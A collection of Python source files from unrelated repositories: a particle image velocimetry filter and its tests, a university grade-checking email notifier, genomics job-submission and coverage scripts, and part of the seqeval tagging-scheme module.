:param stepsize: is the step size for the velocity
:return (positive,negative):
velocities and the binning result for positive half and negative half are returned
as a tuple of numpy arrays
"""
result_pos = []
result_neg = []
alpha = 0.
#: binning of the positive half
while alpha <= np.max(field)+stepsize:
pos = alpha
neg = 0.
filtered = np.copy(field)
filtered[filtered<=neg] = np.nan
filtered[filtered>pos] = np.nan
outlier = np.count_nonzero(~np.isnan(filtered))/np.float(np.count_nonzero(~np.isnan(field)))
result_pos.append([alpha,outlier])
alpha += stepsize
alpha = 0.
#: binning of the negative half
while alpha <= np.abs(np.min(field))+stepsize:
pos = 0.
neg = -1.*alpha
filtered = np.copy(field)
filtered[filtered<=neg] = np.nan
filtered[filtered>pos] = np.nan
outlier = np.count_nonzero(~np.isnan(filtered))/np.float(np.count_nonzero(~np.isnan(field)))
result_neg.append([-1.*alpha,outlier])
alpha += stepsize
return (np.array(result_pos),np.array(result_neg))
def calc_derivative(field,stepsize=0.01):
"""
Function for calculation of the binning.
The returned result is the binning of the velocities.
It is called derivative because it is mathematically the derivative of the function:
.. function:: velofilter.calc_factor
It is done for the negative and positive half separately.
:param field: is a 1D field which will be binned
:param stepsize: is the step size for the velocity
:return (positive,negative):
velocities and the binning result for positive half and negative half are returned
as a tuple
"""
result_pos = []
result_neg = []
outlier = 1.
alpha = 0.
while alpha <= np.max(field)+stepsize:
pos = alpha+stepsize
neg = alpha
filtered = np.copy(field)
filtered[(filtered<=neg) | (filtered>pos)] = np.nan
#filtered[filtered>pos] = np.nan
outlier = np.count_nonzero(~np.isnan(filtered))/np.float(np.count_nonzero(~np.isnan(field)))
result_pos.append([alpha,outlier])
alpha += stepsize
outlier = 1.
alpha = 0.
while alpha <= np.abs(np.min(field))+stepsize:
pos = -1.*alpha
neg = -1.*(alpha+stepsize)
filtered = np.copy(field)
filtered[(filtered<=neg) | (filtered>pos)] = np.nan
#filtered[filtered>pos] = np.nan
outlier = np.count_nonzero(~np.isnan(filtered))/np.float(np.count_nonzero(~np.isnan(field)))
result_neg.append([-1.*alpha,outlier])
alpha += stepsize
return (np.array(result_pos),np.array(result_neg))
def filter(piv,tfactor=3.,dalpha=.01):
"""
Function for calculating the cutoff values.
:param object piv: PIV class object
This is supposed to be an object from a Direct or adaptive Class
it is needed to get the velocities
:param double tfactor: Factor for cutoff in the velocity binning
The default value is set to 3 which works for many cases
:param double dalpha: value for differential velocity
The default is set to .01 which work for many cases
if the velocities vary over a larger ranger use a larger value
"""
#: pre sampling
numberup = np.count_nonzero(piv.u<=0.)/np.float(np.count_nonzero(piv.u))
numberun = np.count_nonzero(piv.u>0.)/np.float(np.count_nonzero(piv.u))
numbervp = np.count_nonzero(piv.v<=0.)/np.float(np.count_nonzero(piv.v))
numbervn = np.count_nonzero(piv.v>0.)/np.float(np.count_nonzero(piv.v))
upos = numberup
uneg = numberun
vpos = numbervp
vneg = numbervn
#: get alpha dependency
up_alpha, un_alpha = calc_factor(piv.u,dalpha)
vp_alpha, vn_alpha = calc_factor(piv.v,dalpha)
#: calculate derivative directly from data
dup_alpha1, dun_alpha1 = calc_derivative(piv.u,dalpha)
dvp_alpha1, dvn_alpha1 = calc_derivative(piv.v,dalpha)
dup_alpha = dup_alpha1[:,1]
dun_alpha = dun_alpha1[:,1]
dvp_alpha = dvp_alpha1[:,1]
dvn_alpha = dvn_alpha1[:,1]
#get boundaries
boundup = np.sum(dup_alpha[0:5])/5./np.exp(tfactor)
boundun = np.sum(dun_alpha[0:5])/5./np.exp(tfactor)
boundvp = np.sum(dvp_alpha[0:5])/5./np.exp(tfactor)
boundvn = np.sum(dvn_alpha[0:5])/5./np.exp(tfactor)
#get indices and exponential
if upos != 0.:
indexup = np.where(dup_alpha<boundup)
cut_up = np.int(np.sum(indexup[0][0:5])/5.)
nup = np.polyfit(np.log( up_alpha[1:cut_up,0]),np.log(up_alpha[1:cut_up,1]),1)
upos = exp(-nup[1]/nup[0])
if uneg != 0.:
indexun = np.where(dun_alpha<boundun)
cut_un = np.int(np.sum(indexun[0][0:5])/5.)
nun = np.polyfit(np.log(-un_alpha[1:cut_un,0]),np.log(un_alpha[1:cut_un,1]),1)
uneg = -exp(-nun[1]/nun[0])
if vpos != 0.:
indexvp = np.where(dvp_alpha<boundvp)
cut_vp = np.int(np.sum(indexvp[0][0:5])/5.)
nvp = np.polyfit(np.log( vp_alpha[1:cut_vp,0]),np.log(vp_alpha[1:cut_vp,1]),1)
vpos = exp(-nvp[1]/nvp[0])
if vneg != 0.:
indexvn = np.where(dvn_alpha<boundvn)
cut_vn = np.int(np.sum(indexvn[0][0:5])/5.)
nvn = np.polyfit(np.log(-vn_alpha[1:cut_vn,0]),np.log(vn_alpha[1:cut_vn,1]),1)
vneg = -exp(-nvn[1]/nvn[0])
#filter + clamping
if upos > np.max(piv.u):
upos = np.max(piv.u)
if uneg < np.min(piv.u):
uneg = np.min(piv.u)
if vpos > np.max(piv.v):
vpos = np.max(piv.v)
if vneg < np.min(piv.v):
vneg = np.min(piv.v)
#equalizing the cutoff
upos *= (0.5+numberup)
uneg *= (0.5+numberun)
vpos *= (0.5+numbervp)
vneg *= (0.5+numbervn)
#making the mask
masku = (piv.u<uneg) | (piv.u>upos)
maskv = (piv.v<vneg) | (piv.v>vpos)
piv.u[masku] = np.nan
piv.v[maskv] = np.nan
```
#### File: pypiv/tests/test_fft_correlator.py
```python
import pytest
import os
import numpy as np
from pypiv import FFTCorrelator
@pytest.fixture(scope='module')
def data():
script_path = os.path.dirname(os.path.realpath(__file__))
file_path = os.path.join(script_path, 'data/center_particle.npy')
window = np.load(file_path)
size = window.shape[0]
fft_corr = FFTCorrelator(window_a_size=size, window_b_size=size)
return (fft_corr, window)
def test_zero_displacement(data):
fft_corr, window = data
assert fft_corr.get_displacement(window, window) == (0, 0)
def test_zero_displacement_2D(data):
fft_corr, window = data
assert fft_corr.get_displacement(window, window,subpixel_method='9point') == (0, 0)
def test_x_displacement(data):
fft_corr, window_a = data
window_b = np.roll(window_a, shift=4, axis=0)
dx, dy = fft_corr.get_displacement(window_a, window_b)
assert abs(dx - 4) < 0.01
assert abs(dy) < 0.01
def test_x_displacement_2D(data):
fft_corr, window_a = data
window_b = np.roll(window_a, shift=4, axis=0)
dx, dy = fft_corr.get_displacement(window_a, window_b,subpixel_method='9point')
assert abs(dx - 4) < 0.01
assert abs(dy) < 0.01
def test_y_displacement(data):
fft_corr, window_a = data
window_b = np.roll(window_a, shift=4, axis=1)
dx, dy = fft_corr.get_displacement(window_a, window_b)
assert abs(dx) < 0.01
assert abs(dy - 4) < 0.01
def test_y_displacement_2D(data):
fft_corr, window_a = data
window_b = np.roll(window_a, shift=4, axis=1)
dx, dy = fft_corr.get_displacement(window_a, window_b,subpixel_method='9point')
assert abs(dx) < 0.01
assert abs(dy - 4) < 0.01
def test_xy_displacement(data):
fft_corr, window_a = data
window_b = np.roll(window_a, shift=4, axis=0)
window_b = np.roll(window_b, shift=4, axis=1)
dx, dy = fft_corr.get_displacement(window_a, window_b)
assert abs(dx - 4) < 0.01
assert abs(dy - 4) < 0.01
def test_xy_displacement_2D(data):
fft_corr, window_a = data
window_b = np.roll(window_a, shift=4, axis=0)
window_b = np.roll(window_b, shift=4, axis=1)
dx, dy = fft_corr.get_displacement(window_a, window_b,subpixel_method='9point')
assert abs(dx - 4) < 0.01
assert abs(dy - 4) < 0.01
def test_xy_displacement_subpixel(data):
fft_corr, window_a = data
window_b = np.load('data/shift05.npy')
#window_a = np.copy(window_b)
#window_b = np.roll(window_b, shift=1, axis=0)
#window_b = np.roll(window_b, shift=1, axis=1)
dx, dy = fft_corr.get_displacement(window_a, window_b)
delta = .5
assert abs(dy - delta) < 0.01
assert abs(dx - delta) < 0.01
def test_xy_displacement_subpixel_2D(data):
fft_corr, window_a = data
window_b = np.load('data/shift05.npy')
#window_a = np.copy(window_b)
#window_b = np.roll(window_b, shift=1, axis=0)
#window_b = np.roll(window_b, shift=1, axis=1)
dx, dy = fft_corr.get_displacement(window_a, window_b,subpixel_method='9point')
delta = .5
assert abs(dy - delta) < 0.01
assert abs(dx - delta) < 0.01
``` |
{
"source": "Jraaay/BUPT_scorechecker",
"score": 3
} |
#### File: Jraaay/BUPT_scorechecker/checkscore.py
```python
import base64
import sys
from bs4 import BeautifulSoup
import requests
import time
import json
import smtplib
from email.mime.text import MIMEText
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# 变量设置
user_Account = '' # 新教务系统学号
user_password = '' # 新教务系统密码
recevie_email = '' # 收取邮件的邮箱地址 eg:<EMAIL>
sender_email = '' # 发送邮件的163邮箱地址 eg:<EMAIL>
sender_email_pass = '' # 163邮箱的授权码
user_encode = str(base64.b64encode(bytes(user_Account, encoding='utf-8')), encoding='utf-8') + \
'%%%' + str(base64.b64encode(bytes(user_password,
encoding='utf-8')), encoding='utf-8')
try:
with open('score.json', encoding='utf-8') as f:
data = json.load(f)
except IOError:
data = {'totalscore': '-1', 'resultarr': []}
changed = False
errortimes = 0
def checkscore():
# 教务系统登录
url = 'https://jwgl.bupt.edu.cn/jsxsd/'
result = requests.get(url, verify=False)
cookies = result.cookies
url = 'https://jwgl.bupt.edu.cn/jsxsd/xk/LoginToXk'
form_data = {
'userAccount': user_Account,
'userPassword': '',
'encoded': user_encode
}
result = requests.post(url, cookies=cookies, data=form_data, verify=False)
url = 'https://jwgl.bupt.edu.cn/jsxsd/kscj/cjcx_list'
form_data = {'kksj': '', 'kcxz': '', 'kcmc': '', 'xsfs': 'all'}
resultraw = requests.post(url,
data=form_data, cookies=cookies, verify=False)
result = resultraw.text
keyword = '所修总学分:'
start = result.find(keyword)
keyword = '绩点:'
end = result.find(keyword)
remainscore = result[start + 6: end].strip()
soup = BeautifulSoup(result, features='html.parser')
try:
table = soup.select('#dataList')[0]
except:
print((time.strftime('%Y-%m-%d %H:%M:%S ', time.localtime()) +
'Results failed to obtain, may be no grades or cookies invalid, please update!').encode(encoding='utf-8'))
sendemail('NULL', 'NULL', 'Please update the invalid cookies!', '')
sys.exit(0)
resultarr = []
allrows = table.select('tr')
for row in allrows:
allcols = row.select('td')
if (len(allcols) == 0):
continue
resultarr.append([])
for col in allcols:
resultarr[-1].append(col.text.strip())
return remainscore, resultarr
def sendemail(remainscore, oldscore, title, answerstr):
# 设置服务器所需信息
# 163邮箱服务器地址
mail_host = 'smtp.163.com'
# 163用户名
mail_user = sender_email
# 密码(部分邮箱为授权码)
mail_pass = sender_email_pass
# 邮件发送方邮箱地址
sender = sender_email
# 邮件接受方邮箱地址,注意需要[]包裹,这意味着你可以写多个邮件地址群发
receivers = [recevie_email]
# 设置email信息
# 邮件内容设置
content = '新剩余学分为:' + remainscore + ',原剩余学分为:' + oldscore + answerstr
message = MIMEText(content, 'plain', 'utf-8')
# 邮件主题
message['Subject'] = title
# 发送方信息
message['From'] = sender
# 接受方信息
message['To'] = receivers[0]
# 登录并发送邮件
try:
smtpObj = smtplib.SMTP()
# 连接到服务器
smtpObj.connect(mail_host, 25)
# 登录到服务器
smtpObj.login(mail_user, mail_pass)
# 发送
smtpObj.sendmail(
sender, receivers, message.as_string())
# 退出
smtpObj.quit()
global changed
print(time.strftime('%Y-%m-%d %H:%M:%S ',
time.localtime()) + 'Email has been sent!')
if (title == '程序出现异常!!!!!!'):
print(time.strftime('%Y-%m-%d %H:%M:%S ', time.localtime()) +
'There are somthing wrong!!! Stop Monitor!!!!')
changed = True
else:
changed = False
data['totalscore'] = remainscore
print(time.strftime('%Y-%m-%d %H:%M:%S ', time.localtime()) +
'Current score has been updated to ' + data['totalscore'] + '. Continue monitor.')
except smtplib.SMTPException as e:
print(time.strftime('%Y-%m-%d %H:%M:%S ', time.localtime()) +
' Email sending error', e) # 打印错误
while changed == False:
try:
remainscore, resultarr = checkscore()
if remainscore == data['totalscore']:
print(time.strftime('%Y-%m-%d %H:%M:%S ', time.localtime()) +
'Checked successfully, there is no change. Remain score is ' + remainscore + '.')
changed = False
else:
print(time.strftime('%Y-%m-%d %H:%M:%S ', time.localtime()) +
'Checked successfully, there are some change! Remain score is ' + remainscore + '! Old score is ' + data['totalscore'])
changed = True
score_dict = {
'totalscore': remainscore,
'resultarr': resultarr
}
with open('score.json', 'w', encoding='utf-8') as json_file:
json.dump(score_dict, json_file, ensure_ascii=False,
indent=4, separators=(',', ': '))
answerstr = '\r\n\r\n以下课程有增加:\r\n'
oldname = [x[3] for x in data['resultarr']]
newname = [x[3] for x in resultarr]
subject_changed = list(set(newname).difference(oldname))
for x in subject_changed:
for y in resultarr:
if (y[3] == x):
answerstr += y[3] + ': ' + y[5] + '\r\n'
if data['totalscore'] != '-1':
sendemail(remainscore, data['totalscore'], '成绩有更新', answerstr)
else:
changed = False
print('First run.')
data['totalscore'] = remainscore
data['resultarr'] = resultarr
time.sleep(10)
except Exception as e:
if errortimes < 2:
errortimes = errortimes + 1
print(time.strftime('%Y-%m-%d %H:%M:%S ', time.localtime()), e)
print(time.strftime('%Y-%m-%d %H:%M:%S ',
time.localtime()) + 'Program is retrying...')
time.sleep(10)
else:
sendemail('', '', '程序出现异常!!!!!!', '')
print(time.strftime('%Y-%m-%d %H:%M:%S ', time.localtime()), e)
``` |
{
"source": "jraab/raab_swisnf_2015",
"score": 2
} |
#### File: raab_swisnf_2015/code/call.calc_enrichment_at_peaks.py
```python
import subprocess
import os
import re
import time
import yaml
# wrapper script to repeatedly call my enrichment mapper
# The directories are not set up to be portable - but the only script this depends
# on is submitCoverageFrame.sh which calls coverageFrame.py
# These are provided in the utils/ directory
peakdir = '/magnuson-lab/jraab/analysis/swi_snf_final/output/macs_peaks/cleaned/'
def allEncodeOverPeaks(peaks, peakdir):
bamdir = '/magnuson-lab/jraab/ENCODE/datafiles/HepG2/combined/'
bams = [b for b in os.listdir(bamdir)if b.endswith('.bam') ]
out = '/magnuson-lab/jraab/analysis/swi_snf_final/output/encode_coverages/'
if not os.path.exists(out):
os.mkdir(out)
yf = open('/magnuson-lab/jraab/ENCODE/datafiles/HepG2/hepg2_input_index.yaml')
yobj = yaml.load(yf)
for input, p in yobj.iteritems():
for ip in p:
ip_f = bamdir+ip
print input, ip
input_f = bamdir+input
for s in peaks:
bamname = ip.split('.')[0].split('Hepg2')[1]
pname = s.split('_')[0]
print bamname, pname
qsub_cmd = 'qsub -V -v P='+peakdir+s+',B='+ip_f+',I='+input_f+',BNAME='+bamname+',O='+out+',PNAME='+pname+' submitCoverageFrame.sh'
print qsub_cmd.split()
subprocess.call(qsub_cmd.split(), shell=False)
time.sleep(3)
time.sleep(10)
yf = open('/magnuson-lab/jraab/ENCODE/datafiles/HepG2/haib.yml')
yobj = yaml.load(yf)
for input, p in yobj.iteritems():
for ip in p:
ip_f = bamdir+ip
print input, ip
input_f = bamdir+input
for s in peaks:
bamname = ip.split('.')[0].split('Hepg2')[1]
pname = s.split('_')[0]
print bamname, pname
qsub_cmd = 'qsub -V -v P='+peakdir+s+',B='+ip_f+',I='+input_f+',BNAME='+bamname+',O='+out+',PNAME='+pname+' submitCoverageFrame.sh'
print qsub_cmd.split()
subprocess.call(qsub_cmd.split(), shell=False)
time.sleep(3)
time.sleep(10)
#pass in a list of peak summits and a directory they came ffrom
peakdir = '/magnuson-lab/jraab/analysis/swi_snf_final/output/macs_peaks/cleaned/'
summits = [ s for s in os.listdir(peakdir) if s.endswith('_cf.bed')]
print summits
#allEncodeOverPeaks(summits, peakdir)
multi_summit = [s for s in os.listdir(peakdir) if s.endswith('multi_bound_peaks.csv') ]
#allEncodeOverPeaks(multi_summit, peakdir)
# do the dnase separately
summits.append(multi_summit[0])
for peaks in summits:
bamdir = '/magnuson-lab/jraab/ENCODE/datafiles/HepG2/combined/'
out = '/magnuson-lab/jraab/analysis/swi_snf_final/output/encode_coverages/'
signal_file = 'wgEncodeOpenChromDnaseHepg2Aln.sorted.merged.bam'
bamname = 'DNase'
pname = peaks.split('_')[0]
ip_f = bamdir+signal_file
qsub_cmd = 'qsub -V -v P='+peakdir+peaks+',B='+ip_f+',I=NULL,BNAME='+bamname+',OUT='+out+',PNAME='+pname+' submitCoverageFrame.sh'
print qsub_cmd.split()
subprocess.call(qsub_cmd.split(), shell = False)
time.sleep(3)
```
#### File: code/chip_analysis/merge_and_filter_peaks.py
```python
import pybedtools as pbt
import os
import pandas as pd
directory = '/magnuson-lab/jraab/analysis/swi_snf_final/'
peakdir = directory + 'output/macs_peaks/'
patt = 'broadPeak'
blacklist = '/magnuson-lab/jraab/annotations/combinedblacklist.expanded.bed'
blacklist_bt = pbt.BedTool(blacklist)
def exclude_regions_by_bedtool(bt, filter):
""" take a bedtool and filter bedtool to exclude any intervals that overlap the blacklist """
if filter.any_hits(bt):
return(False)
else:
return(True)
files = [p for p in os.listdir(peakdir) if p.endswith(patt) ]
for f in files:
bt = pbt.BedTool(peakdir + f)
name = f.split('.')[0]
bt.merge(d=100)
bt_filtered = bt.filter(exclude_regions_by_bedtool, filter = blacklist_bt)
bt_filtered.saveas('/magnuson-lab/jraab/scratch/tmp.bed')
df = pd.read_table('/magnuson-lab/jraab/scratch/tmp.bed', names=['chrom', 'start', 'end', 'name', 'score', 'strand', 'x', 'y', 'z'] )
df = df.ix[:,0:6]
print df.head()
df['name'] = [name +'_'+ str(i) for i in range(df['name'].shape[0] ) ]
df.to_csv( peakdir + 'cleaned/' + name + '_cf.bed', index=False, header=False, sep='\t' )
```
#### File: code/util/bamToWig_chip.py
```python
import argparse
import HTSeq
import numpy
import os
import sys
parser = argparse.ArgumentParser(description = 'Convert BAM files to wiggle tracks' )
parser.add_argument('-b', help='input bam' )
parser.add_argument('--norm', help = 'Normalize by read depth' , action='store_true')
parser.add_argument('-s', help = 'separate files for + and - strand', action='store_true', default=False)
parser.add_argument('-g', help = 'genome name e.g hg19')
parser.add_argument('-d', help = 'outputdirectory')
parser.add_argument('-frag', help = 'fragment size of library', default = 200)
args = parser.parse_args()
binsize = 30 # looksl like encode bins things at about 30 bases or so)
home = 'magnuson-lab/jraab/'
################################
def calc_coverage(bamfile, chrom_dict, fragmentsize, stranded=False):
read_count =0
millions =1
bamfile = HTSeq.BAM_Reader(bamfile)
fragmentsize = fragmentsize #smooth out reads based on fragmentsizes
if stranded==True:
cvg = HTSeq.GenomicArray(chrom_dict, stranded=True, typecode='d', storage='step')
else:
cvg = HTSeq.GenomicArray(chrom_dict, stranded=False, typecode='d', storage='step')
for almnt in bamfile:
if almnt.aligned:
end_of_chrom = chrom_dict[almnt.iv.chrom]
almnt.iv.length = fragmentsize
if almnt.iv.start <1:
almnt.iv.start =1
if almnt.iv.end > end_of_chrom:
almnt.iv.end = end_of_chrom
cvg[almnt.iv]+=1
read_count += 1
if read_count % 1e6 == 0:
processed = int(1e6*millions)
print ' Processed %.1E reads' % processed
millions +=1
if args.norm:
normfactor = 1e6*binsize/read_count
for iv, val in cvg.steps():
cvg[iv].apply(lambda x: x* normfactor)
else:
cvg = cvg
return(cvg)
def read_genome(genome):
with open(genome) as g:
chrom_sizes=dict()
for l in g:
if l.startswith('chrom'):
next
else :
chrom_sizes[l.split('\t')[0]] = int(l.split('\t')[1])
return(chrom_sizes)
###############################
#this file must exist
if args.g == 'hg19':
genome = '/magnuson-lab/shared/jraab/genome_sizes/genome_hg19.txt'
chrom_sizes = read_genome(genome)
elif args.g =='mm9':
chrom_sizes = '/magnuson-lab/shared/jraab/genome_sizes/genome_mm9.txt'
chrom_sizes = read_genome(genome)
else:
sys.exit('Need to input a valid genome hg19 or mm9')
name = args.b.split('/')[-1]
name = name.split('.')[0]
#change this if you want output to go somewhere else
dir = args.d
if not os.path.exists(dir):
os.makedirs(dir)
filename=os.path.basename(args.b).split('.')[0]
if args.s == True:
#for RNAseq stranded protocol these will come out backwards.
genome_cvg= calc_coverage(args.b, chrom_sizes, stranded=True)
genome_cov_plus.write_bedgraph(dir+filename+'_plus.bg', strand='+')
genome_cov_minus.write_bedgraph(dir+filename+'_minus.bg', strand='-')
else:
genome_cov= calc_coverage(args.b, chrom_sizes, stranded=False, fragmentsize = int(args.frag))
genome_cov.write_bedgraph_file(dir+filename+'.bg')
``` |
{
"source": "jrabag/seqeval",
"score": 3
} |
#### File: seqeval/seqeval/scheme.py
```python
import enum
from itertools import chain
from typing import List, Set, Tuple, Type
class Entity:
def __init__(self, sent_id: int, start: int, end: int, tag: str):
self.sent_id = sent_id
self.start = start
self.end = end
self.tag = tag
def __repr__(self):
return '({}, {}, {}, {})'.format(self.sent_id, self.tag, self.start, self.end)
def __eq__(self, other: 'Entity'):
return self.to_tuple() == other.to_tuple()
def __hash__(self):
return hash(self.to_tuple())
def to_tuple(self):
return self.sent_id, self.tag, self.start, self.end
def match_start_offset(self, other: 'Entity'):
return self.start == other.start
def match_end_offset(self, other: 'Entity'):
return self.end == other.end
def match_partially(self, other: 'Entity'):
if self.match_start_offset(other) and not self.match_end_offset(other):
return True
if not self.match_start_offset(other) and self.match_end_offset(other):
return True
return False
class Prefix(enum.Flag):
I = enum.auto()
O = enum.auto()
B = enum.auto()
E = enum.auto()
S = enum.auto()
U = enum.auto()
L = enum.auto()
ANY = I | O | B | E | S | U | L
Prefixes = dict(Prefix.__members__)
class Tag(enum.Flag):
SAME = enum.auto()
DIFF = enum.auto()
ANY = SAME | DIFF
class Token:
allowed_prefix = None
start_patterns = None
inside_patterns = None
end_patterns = None
def __init__(self, token: str, suffix: bool = False, delimiter: str = '-'):
self.token = token
self.prefix = Prefixes[token[-1]] if suffix else Prefixes[token[0]]
tag = token[:-1] if suffix else token[1:]
self.tag = tag.strip(delimiter) or '_'
def __repr__(self):
return self.token
def is_valid(self):
"""Check whether the prefix is allowed or not."""
if self.prefix not in self.allowed_prefix:
allowed_prefixes = str(self.allowed_prefix).replace('Prefix.', '')
message = 'Invalid token is found: {}. Allowed prefixes are: {}.'
raise ValueError(message.format(self.token, allowed_prefixes))
return True
def is_start(self, prev: 'Token'):
"""Check whether the current token is the start of chunk."""
return self.check_patterns(prev, self.start_patterns)
def is_inside(self, prev: 'Token'):
"""Check whether the current token is inside of chunk."""
return self.check_patterns(prev, self.inside_patterns)
def is_end(self, prev: 'Token'):
"""Check whether the previous token is the end of chunk."""
return self.check_patterns(prev, self.end_patterns)
def check_tag(self, prev: 'Token', cond: Tag):
"""Check whether the tag pattern is matched."""
if cond == Tag.ANY:
return True
if prev.tag == self.tag and cond == Tag.SAME:
return True
if prev.tag != self.tag and cond == Tag.DIFF:
return True
return False
def check_patterns(self, prev: 'Token', patterns: Set[Tuple[Prefix, Prefix, Tag]]):
"""Check whether the prefix patterns are matched."""
for prev_prefix, current_prefix, tag_cond in patterns:
if prev.prefix in prev_prefix and self.prefix in current_prefix and self.check_tag(prev, tag_cond):
return True
return False
class IOB1(Token):
allowed_prefix = Prefix.I | Prefix.O | Prefix.B
start_patterns = {
(Prefix.O, Prefix.I, Tag.ANY),
(Prefix.I, Prefix.I, Tag.DIFF),
(Prefix.B, Prefix.I, Tag.ANY),
(Prefix.I, Prefix.B, Tag.SAME),
(Prefix.B, Prefix.B, Tag.SAME)
}
inside_patterns = {
(Prefix.B, Prefix.I, Tag.SAME),
(Prefix.I, Prefix.I, Tag.SAME)
}
end_patterns = {
(Prefix.I, Prefix.I, Tag.DIFF),
(Prefix.I, Prefix.O, Tag.ANY),
(Prefix.I, Prefix.B, Tag.ANY),
(Prefix.B, Prefix.O, Tag.ANY),
(Prefix.B, Prefix.I, Tag.DIFF),
(Prefix.B, Prefix.B, Tag.SAME)
}
class IOE1(Token):
# Todo: IOE1 hasn't yet been able to handle some cases. See unit testing.
allowed_prefix = Prefix.I | Prefix.O | Prefix.E
start_patterns = {
(Prefix.O, Prefix.I, Tag.ANY),
(Prefix.I, Prefix.I, Tag.DIFF),
(Prefix.E, Prefix.I, Tag.ANY),
(Prefix.E, Prefix.E, Tag.SAME)
}
inside_patterns = {
(Prefix.I, Prefix.I, Tag.SAME),
(Prefix.I, Prefix.E, Tag.SAME)
}
end_patterns = {
(Prefix.I, Prefix.I, Tag.DIFF),
(Prefix.I, Prefix.O, Tag.ANY),
(Prefix.I, Prefix.E, Tag.DIFF),
(Prefix.E, Prefix.I, Tag.SAME),
(Prefix.E, Prefix.E, Tag.SAME)
}
class IOB2(Token):
allowed_prefix = Prefix.I | Prefix.O | Prefix.B
start_patterns = {
(Prefix.ANY, Prefix.B, Tag.ANY)
}
inside_patterns = {
(Prefix.B, Prefix.I, Tag.SAME),
(Prefix.I, Prefix.I, Tag.SAME)
}
end_patterns = {
(Prefix.I, Prefix.O, Tag.ANY),
(Prefix.I, Prefix.I, Tag.DIFF),
(Prefix.I, Prefix.B, Tag.ANY),
(Prefix.B, Prefix.O, Tag.ANY),
(Prefix.B, Prefix.I, Tag.DIFF),
(Prefix.B, Prefix.B, Tag.ANY)
}
class IOE2(Token):
allowed_prefix = Prefix.I | Prefix.O | Prefix.E
start_patterns = {
(Prefix.O, Prefix.I, Tag.ANY),
(Prefix.O, Prefix.E, Tag.ANY),
(Prefix.E, Prefix.I, Tag.ANY),
(Prefix.E, Prefix.E, Tag.ANY),
(Prefix.I, Prefix.I, Tag.DIFF),
(Prefix.I, Prefix.E, Tag.DIFF)
}
inside_patterns = {
(Prefix.I, Prefix.E, Tag.SAME),
(Prefix.I, Prefix.I, Tag.SAME)
}
end_patterns = {
(Prefix.E, Prefix.ANY, Tag.ANY)
}
class IOBES(Token):
allowed_prefix = Prefix.I | Prefix.O | Prefix.B | Prefix.E | Prefix.S
start_patterns = {
(Prefix.ANY, Prefix.B, Tag.ANY),
(Prefix.ANY, Prefix.S, Tag.ANY)
}
inside_patterns = {
(Prefix.B, Prefix.I, Tag.SAME),
(Prefix.B, Prefix.E, Tag.SAME),
(Prefix.I, Prefix.I, Tag.SAME),
(Prefix.I, Prefix.E, Tag.SAME)
}
end_patterns = {
(Prefix.S, Prefix.ANY, Tag.ANY),
(Prefix.E, Prefix.ANY, Tag.ANY)
}
class BILOU(Token):
allowed_prefix = Prefix.B | Prefix.I | Prefix.L | Prefix.O | Prefix.U
start_patterns = {
(Prefix.ANY, Prefix.B, Tag.ANY),
(Prefix.ANY, Prefix.U, Tag.ANY)
}
inside_patterns = {
(Prefix.B, Prefix.I, Tag.SAME),
(Prefix.B, Prefix.L, Tag.SAME),
(Prefix.I, Prefix.I, Tag.SAME),
(Prefix.I, Prefix.L, Tag.SAME)
}
end_patterns = {
(Prefix.U, Prefix.ANY, Tag.ANY),
(Prefix.L, Prefix.ANY, Tag.ANY)
}
class Tokens:
def __init__(self, tokens: List[str], scheme: Type[Token],
suffix: bool = False, delimiter: str = '-', sent_id: int = None):
self.outside_token = scheme('O', suffix=suffix, delimiter=delimiter)
self.tokens = [scheme(token, suffix=suffix, delimiter=delimiter) for token in tokens]
self.extended_tokens = self.tokens + [self.outside_token]
self.sent_id = sent_id
@property
def entities(self):
"""Extract entities from tokens.
Returns:
list: list of Entity.
Example:
>>> tokens = Tokens(['B-PER', 'I-PER', 'O', 'B-LOC'], IOB2)
>>> tokens.entities
[('PER', 0, 2), ('LOC', 3, 4)]
"""
i = 0
entities = []
prev = self.outside_token
while i < len(self.extended_tokens):
token = self.extended_tokens[i]
token.is_valid()
if token.is_start(prev):
end = self._forward(start=i + 1, prev=token)
if self._is_end(end):
entity = Entity(sent_id=self.sent_id, start=i, end=end, tag=token.tag)
entities.append(entity)
i = end
else:
i += 1
prev = self.extended_tokens[i - 1]
return entities
def _forward(self, start: int, prev: Token):
for i, token in enumerate(self.extended_tokens[start:], start):
if token.is_inside(prev):
prev = token
else:
return i
return len(self.tokens) - 1
def _is_end(self, i: int):
token = self.extended_tokens[i]
prev = self.extended_tokens[i - 1]
return token.is_end(prev)
class Entities:
def __init__(self, sequences: List[List[str]], scheme: Type[Token], suffix: bool = False, delimiter: str = '-'):
self.entities = [
Tokens(seq, scheme=scheme, suffix=suffix, delimiter=delimiter, sent_id=sent_id).entities
for sent_id, seq in enumerate(sequences)
]
def filter(self, tag_name: str):
entities = {entity for entity in chain(*self.entities) if entity.tag == tag_name}
return entities
@property
def unique_tags(self):
tags = {
entity.tag for entity in chain(*self.entities)
}
return tags
def auto_detect(sequences: List[List[str]], suffix: bool = False, delimiter: str = '-'):
"""Detects scheme automatically.
auto_detect supports the following schemes:
- IOB2
- IOE2
- IOBES
"""
prefixes = set()
error_message = 'This scheme is not supported: {}'
for tokens in sequences:
for token in tokens:
try:
token = Token(token, suffix=suffix, delimiter=delimiter)
prefixes.add(token.prefix)
except KeyError:
raise ValueError(error_message.format(token))
allowed_iob2_prefixes = [
{Prefix.I, Prefix.O, Prefix.B},
{Prefix.I, Prefix.B},
{Prefix.B, Prefix.O},
{Prefix.B}
]
allowed_ioe2_prefixes = [
{Prefix.I, Prefix.O, Prefix.E},
{Prefix.I, Prefix.E},
{Prefix.E, Prefix.O},
{Prefix.E}
]
allowed_iobes_prefixes = [
{Prefix.I, Prefix.O, Prefix.B, Prefix.E, Prefix.S},
{Prefix.I, Prefix.B, Prefix.E, Prefix.S},
{Prefix.I, Prefix.O, Prefix.B, Prefix.E},
{Prefix.O, Prefix.B, Prefix.E, Prefix.S},
{Prefix.I, Prefix.B, Prefix.E},
{Prefix.B, Prefix.E, Prefix.S},
{Prefix.O, Prefix.B, Prefix.E},
{Prefix.B, Prefix.E},
{Prefix.S}
]
allowed_bilou_prefixes = [
{Prefix.I, Prefix.O, Prefix.B, Prefix.L, Prefix.U},
{Prefix.I, Prefix.B, Prefix.L, Prefix.U},
{Prefix.I, Prefix.O, Prefix.B, Prefix.L},
{Prefix.O, Prefix.B, Prefix.L, Prefix.U},
{Prefix.I, Prefix.B, Prefix.L},
{Prefix.B, Prefix.L, Prefix.U},
{Prefix.O, Prefix.B, Prefix.L},
